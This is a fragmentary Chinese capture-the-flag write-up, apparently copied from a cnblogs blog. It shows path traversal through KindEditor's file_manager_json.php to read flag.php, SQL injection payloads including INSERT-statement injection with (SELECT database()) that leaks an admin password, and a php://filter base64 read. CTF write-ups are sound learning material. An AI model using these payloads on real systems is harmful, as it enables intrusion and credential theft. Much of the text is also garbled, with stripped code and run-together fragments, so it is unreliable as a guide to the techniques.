hello world
然后有注册有登录
不多说我们直接注册登录试试
POST
没什么重要的回显
再上传一个文档试试
kindeditor
kindeditorhttps://www.jb51.net/hack/367946.html
url/kindeditor/php/file_manager_json.php
?path=
/kindeditor/php/file_manager_json.php?path=/
有回显,成功了
再通过
?path=../
?path=../../
?path=../../../
来访问一层层的文件夹
flag.php
url/kindeditor/php/file_manager_json.php?path=../../flag.php
url/flag.php
...............
flag
尝试在上传输入框中进行注入
1' or '1'='1
1' or '1'='0
发现回显不一样,肯定存在注入了就
unionselect
dalao
sql:INSERT INTO TABLENAME(A,B,C) VALUES($A,$B,$C);
A,B,C
insert into tableA values(A1,B1,C1), (A2,B2,C2) tableA
insert... values('aaa','testpayload2','test')#
test')#
爆错
insertinsert4
test','X')#
没有报错
test','X'),('123',(SELECT database()),'content
payloadXinsertinsertdatabase() select
select
userpassword
adminmelody123
manage
url
php://filterflag.php
base64
flag
来源:博客园
作者:七星易
链接:https://www.cnblogs.com/wosun/p/11505981.html